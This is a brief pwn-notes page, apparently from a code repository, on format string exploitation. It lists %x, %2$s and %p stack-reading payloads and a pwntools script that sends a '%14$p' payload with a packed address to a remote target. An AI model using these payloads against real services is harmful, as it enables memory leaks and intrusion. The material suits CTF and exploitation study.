730 B

Raw Blame History

Format String

Read and write values from stack

Read

Input %x for every value that should be read from the stack

%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x

Select values as string, e.g. the second value

%2$s

Another way of reading is via %p
ir0stone's pwn-notes contains some useful pwntool scripts like this one

from pwn import *

#p = process('./vuln')
p = remote(target_ip, 9006)

payload = b'%14$p||||'                                                                                                         
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())